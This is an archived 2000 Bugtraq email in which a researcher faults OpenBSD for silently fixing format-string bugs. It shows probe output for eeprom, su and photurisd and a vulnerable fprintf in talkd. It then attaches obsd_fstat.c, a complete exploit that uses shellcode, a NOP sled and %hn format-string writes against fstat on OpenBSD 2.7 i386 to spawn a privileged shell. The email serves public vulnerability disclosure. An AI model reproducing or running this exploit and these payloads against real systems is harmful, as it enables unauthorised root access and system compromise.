From - Wed Oct 4 00:31:03 2000
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Message-ID: <39DADCB7.4E416D8B@ktwo.ca>
Date: Wed, 04 Oct 2000 00:31:03 -0700
From: K2 <ktwo@ktwo.ca>
X-Mailer: Mozilla 4.75 [en] (X11; U; SunOS 5.8 i86pc)
X-Accept-Language: en
MIME-Version: 1.0
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: OpenBSD Security Advisory
Content-Type: multipart/mixed;
boundary="------------992D28E153FBFC29A2AF3CB8"

This is a multi-part message in MIME format.
--------------992D28E153FBFC29A2AF3CB8
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,
Here is another exploit for an application (fstat) that
OpenBSD's
format string audit has seemingly forgotten about. What I would like to
know is why this and a number of other privileged applications have
security vulnerabilities in them. They WERE fixed, but NO ADVISORY nor
ANY MENTION IN THEIR DAILY CHANGLOG! How can the impact of the
vulnerability not be realized when they occur in something as privileged
as that would be using pw_error()?

What about eeprom?

---- SNIP -- SNIP ----
$ uname -a
OpenBSD vishnu 2.7 GENERIC#13 sparc
$ eeprom "%p %p %p %p %p %p %p %p %p %p %p %p"
eeprom: nothing available for 0x0 0xf7ffeef4 0x4 0xf7ffeef8 0xf9f5ffb0
0x0 0x0 0x0 0xf7fff760 0xb400 0xa800 0xac00
---- SNIP -- SNIP ----

There is also su, although it is only exploitable by the
usershell=format string, there is a possibility that somebody have a
third party application set the user shell to something that may be
malicious. Why no even passing mention in their "Daily Changelog" or
their security pages?

---- SNIP -- SNIP ----
rain:/usr/src/libexec/talkd# su - ktwo
su: /usr/local/bin/bash0x00x1b150xdfbfdc8c0xdfbfdc280xdfbfdc2c: No such
file or directory
rain:/usr/src/libexec/talkd# cat /etc/passwd|grep ktwo
ktwo:*:100:100:what's your
style,,,:/home/ktwo:/usr/local/bin/bash%p%p%p%p%p
---- SNIP -- SNIP ----

OK, hold on a second.... The following "snip snip" is a little long...
and I have not verified it, (a guaranteed DoS though).

talkd, A DEFAULT service.

---- SNIP -- SNIP ---- SNIP
(void)snprintf(line_buf[i], N_CHARS, "talk: respond with: talk
%s@%s",
vis_user, remote_machine);
sizes[i] = strlen(line_buf[i]);
max_size = max(max_size, sizes[i]);
i++;
(void)snprintf(line_buf[i], N_CHARS, " ");
sizes[i] = strlen(line_buf[i]);
max_size = max(max_size, sizes[i]);
i++;
bptr = big_buf;
*bptr++ = '\007'; /* send something to wake them up */
*bptr++ = '\r'; /* add a \r in case of raw mode */
*bptr++ = '\n';
for (i = 0; i < N_LINES; i++) {
/* copy the line into the big buffer */
lptr = line_buf[i];
while (*lptr != '\0')
*(bptr++) = *(lptr++);
/* pad out the rest of the lines with blanks */
for (j = sizes[i]; j < max_size + 2; j++)
*(bptr++) = ' ';
*(bptr++) = '\r'; /* add a \r in case of raw mode
*/
*(bptr++) = '\n';
}
*bptr = '\0';
fprintf(tf, big_buf);
fflush(tf);
---- SNIP -- SNIP ----
(it's that fprintf up 2 lines ;)


WOW what about photurisd?

---- SNIP -- SNIP ----
rain:/tmp# uname -a
OpenBSD rain 2.7 conf#3 i386
rain:/tmp# photurisd -d "%p %p %p %p %p %p %p %p"
Error: chdir("0xf6c5 0xdfbfdbac 0xf724 0xdfbfdc7d 0x0 0x1a726 0xf6bd
0x64") in main() : No such file or directory.
---- SNIP -- SNIP ----

This is a daemon that runs listening to UDP in part of the OpenBSD IPSEC
suite. This vulnerability shown here is exploitable through it's faulty
custom logging functions, any of the places where this canned function
is used, there is the potential for exploitation. I have not fully
audited the source, so I cannot verify an immediate problem, but don't
you think that it should have deserved an honorable mention after a fix
applied?

Where are these advisories from the OpenBSD TEAM? Is their pride to
great to accept these bugs, code fix, announce patch and move on?

I do not believe that silently fixing vulnerabilities is in the best
interest of anybody.

------------------
K2 (ktwo@ktwo.ca)
http://www.ktwo.ca

PS. Thx caddis for some tips ;)
--------------992D28E153FBFC29A2AF3CB8
Content-Type: text/plain; charset=us-ascii;
name="obsd_fstat.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="obsd_fstat.c"

/*
* theoBSD fstat - private caddis & K2 release
* TagTeam exploit coding @$_*#%*&(#%(**(@$*($@
*
* greets: #!adm, #!teso, #!w00w00
*
*/
#include <stdio.h>

char bsd_shellcode[] =
"\xeb\x16\x5e\x31\xc0\x8d\x0e\x89"
"\x4e\x08\x89\x46\x0c\x8d\x4e\x08"
"\x50\x51\x56\x50\xb0\x3b\xcd\x80"
"\xe8\xe5\xff\xff\xff/bin/sh";

struct platform {
char *name;
unsigned short count;
unsigned long dest_addr;
unsigned long shell_addr;
char *shellcode;
};

struct platform targets[2] =
{
{ "OpenBSD 2.7 i386 ", 590, 0xdfbfc490, 0xdfbfde04, bsd_shellcode },
{ NULL, 0, 0, 0, NULL }
};

char fmt_string[3072], jmpcode[500] = "PWD=HI", term[] = "TERM=xterm";
char *envs[] = { term, jmpcode, NULL};

void usage(char *name)
{
printf("%s <TARGET>\n"
"1 - OpenBSD 2.7 i386\n", name);
exit(1);
}

int main(int argc, char *argv[])
{
char *p;
int x, len = 0;
struct platform *target;
unsigned short low, high;
unsigned long shell_addr[2], dest_addr[2];

if (argc != 2)
usage(argv[0]);

x = atoi(argv[1]) - 1;
if (x > ((sizeof(targets)-sizeof(struct platform)) / sizeof(struct platform)) - 1 || x < 0)
usage(argv[0]);

target = &targets[x];

memset(fmt_string, 0, sizeof(fmt_string));
len = (sizeof(long) * 4) + 2;
p = fmt_string + len;
for (x = 0; x < target->count; x++) {
strcat(p, "%8x");
len += 8;
}

shell_addr[0] = (target->shell_addr & 0xffff0000) >> 16;
shell_addr[1] = target->shell_addr & 0xffff;

if (shell_addr[1] > shell_addr[0]) {
dest_addr[0] = target->dest_addr+2;
dest_addr[1] = target->dest_addr;
low = shell_addr[0] - len;
high = shell_addr[1] - low - len;
} else {
dest_addr[0] = target->dest_addr;
dest_addr[1] = target->dest_addr+2;
low = shell_addr[1] - len;
high = shell_addr[0] - low - len;
}

memcpy(fmt_string, "!!", 2);
*(long *)&fmt_string[2] = 0x11111111;
*(long *)&fmt_string[6] = dest_addr[0];
*(long *)&fmt_string[10] = 0x11111111;
*(long *)&fmt_string[14] = dest_addr[1];

memset(jmpcode, 0x90, sizeof(jmpcode));
strcpy(jmpcode + (sizeof(jmpcode) - strlen(target->shellcode) - 1), target->shellcode);

p = fmt_string + strlen(fmt_string);
sprintf(p, "%%%dd%%hn%%%dd%%hn", low, high);

execle("/usr/bin/fstat", "fstat", fmt_string, NULL, envs);
perror("execve");
}

--------------992D28E153FBFC29A2AF3CB8--